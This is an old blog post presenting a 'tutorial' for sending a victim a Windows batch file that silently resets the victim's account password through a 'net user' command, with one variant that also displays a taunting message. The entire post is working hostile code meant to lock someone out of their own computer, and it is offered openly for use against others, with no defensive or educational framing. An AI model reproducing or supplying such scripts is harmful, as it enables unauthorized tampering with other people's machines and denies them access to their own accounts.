Wednesday, April 14, 2010

Change Someone Computer Password

This tutorial is on sending your victim a batch file and it will change there windows password!

Ok 1st.. Open notepad type one of the following..
(Choices on what will happen's to the victim's computer)
.................................................................................................
Choices :
.................................................................................................
Code with personal message:

@echo off
net user %USERNAME% (The new password) > NUL
echo (Your personal message)
pause > NUL

.................................................................................................

Code without personal message:

@net user %USERNAME% (The new password) > NUL

.................................................................................................

No comments:

Post a Comment